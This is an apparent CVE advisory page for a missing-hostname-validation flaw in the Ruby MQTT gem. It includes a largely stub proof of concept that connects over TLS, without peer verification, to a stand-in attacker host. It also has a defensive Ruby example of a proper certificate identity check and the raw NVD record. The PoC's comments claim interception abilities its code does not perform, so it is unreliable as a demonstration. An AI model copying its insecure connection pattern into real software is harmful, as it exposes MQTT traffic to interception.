Security Vulnerability Report
CVE-2025-12790 CVSS 7.4 HIGH

CVE-2025-12790

Published: 2025-11-06 21:15:40
Last Modified: 2026-04-15 00:35:42

Description

A flaw was found in Rubygem MQTT. By default, the package previously performed no hostname validation, making Man-in-the-Middle (MITM) attacks possible.

CVSS Details

CVSS Score: 7.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Rubygem MQTT < 0.7.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```ruby
# CVE-2025-12790 PoC - MITM Attack on Rubygem MQTT
# This PoC demonstrates the hostname validation bypass vulnerability
require 'mqtt'
require 'openssl'

# Create a fake MQTT server with self-signed certificate
class FakeMQTTServer
  def initialize(cert_path, key_path)
    @cert = OpenSSL::X509::Certificate.new(File.read(cert_path))
    @key = OpenSSL::PKey::RSA.new(File.read(key_path))
  end

  def start_fake_server(port = 8883)
    # Simulate malicious server accepting connections
    puts "[*] Fake MQTT server running on port #{port}"
    puts "[*] Waiting for victim connection..."
    # In real attack, this would intercept and manipulate traffic
  end
end

# Vulnerable client connection (without hostname verification)
def vulnerable_mqtt_connect(broker_host)
  # Default behavior - hostname validation is disabled
  MQTT::Client.connect(
    host: broker_host,
    port: 8883,
    ssl: true
    # Missing: verify_mode: OpenSSL::SSL::VERIFY_PEER
    # Missing: cert_chain_file for proper validation
  )
end

# Example of vulnerable usage
begin
  client = vulnerable_mqtt_connect('attacker-controlled-server.example.com')
  # Connection succeeds even with fake certificate
  puts '[!] Connection established - hostname validation bypassed!'
  puts '[!] All traffic is now visible to MITM attacker'
  # Attacker's interception capabilities:
  # 1. Read all published messages
  # 2. Modify message content
  # 3. Inject fake commands
  # 4. Disconnect legitimate clients
rescue => e
  puts "[!] Error: #{e.message}"
end
```
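The check the description says was missing, seen from the defender's side, as an added example (not code from this page or from the ruby-mqtt project): using only Ruby's standard `openssl` library and a constructed test CA, it shows a certificate that passes chain validation yet fails the hostname check. The helper names (`make_cert`, `accept_peer?`, `demo`) and the example hostnames are assumptions made for illustration.

```ruby
require 'openssl'

# Constructed test PKI: builds a certificate for `cn`, signed by `issuer`
# (a [cert, key] pair), or a self-signed CA certificate when `issuer` is nil.
def make_cert(cn, issuer: nil, dns_names: [])
  key = OpenSSL::PKey::RSA.new(2048)
  cert = OpenSSL::X509::Certificate.new
  cert.version = 2 # X.509 v3
  cert.serial = issuer ? 2 : 1
  cert.subject = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert.issuer = issuer ? issuer[0].subject : cert.subject
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after = Time.now + 3600
  ef = OpenSSL::X509::ExtensionFactory.new(issuer ? issuer[0] : cert, cert)
  san = dns_names.map { |n| "DNS:#{n}" }.join(',')
  ext = issuer ? ['subjectAltName', san, false] : ['basicConstraints', 'CA:TRUE', true]
  cert.add_extension(ef.create_extension(*ext))
  cert.sign(issuer ? issuer[1] : key, OpenSSL::Digest.new('SHA256'))
  [cert, key]
end

# Chain validation only: was the certificate issued by a trusted CA?
def chain_trusted?(cert, store)
  store.verify(cert)
end

# Identity check: does the certificate name the host the client intended?
def identity_matches?(cert, expected_host)
  OpenSSL::SSL.verify_certificate_identity(cert, expected_host)
end

# A client should require both before sending any MQTT packet.
def accept_peer?(cert, store, expected_host)
  chain_trusted?(cert, store) && identity_matches?(cert, expected_host)
end

# Constructed scenario: a trusted CA issued a certificate for another name.
def demo
  ca = make_cert('Constructed Test CA')
  presented, = make_cert('other.example.net', issuer: ca, dns_names: ['other.example.net'])
  store = OpenSSL::X509::Store.new
  store.add_cert(ca[0])
  { chain_only: chain_trusted?(presented, store),
    intended_host: accept_peer?(presented, store, 'broker.example.com'),
    named_host: accept_peer?(presented, store, 'other.example.net') }
end

p demo if $PROGRAM_NAME == __FILE__
```

A client that stops at `chain_trusted?` accepts any certificate the trusted CA has issued, whatever host it names; only the combined check ties the TLS session to the broker the client meant to reach.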

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12790", "sourceIdentifier": "[email protected]", "published": "2025-11-06T21:15:40.000", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Rubygem MQTT. By default, the package used to not have hostname validation, resulting in possible Man-in-the-Middle (MITM) attack."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-29"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-12790", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2413004", "source": "[email protected]"}, {"url": "https://github.com/njh/ruby-mqtt/blob/main/NEWS.md#ruby-mqtt-version-070-2025-10-29", "source": "[email protected]"}]}}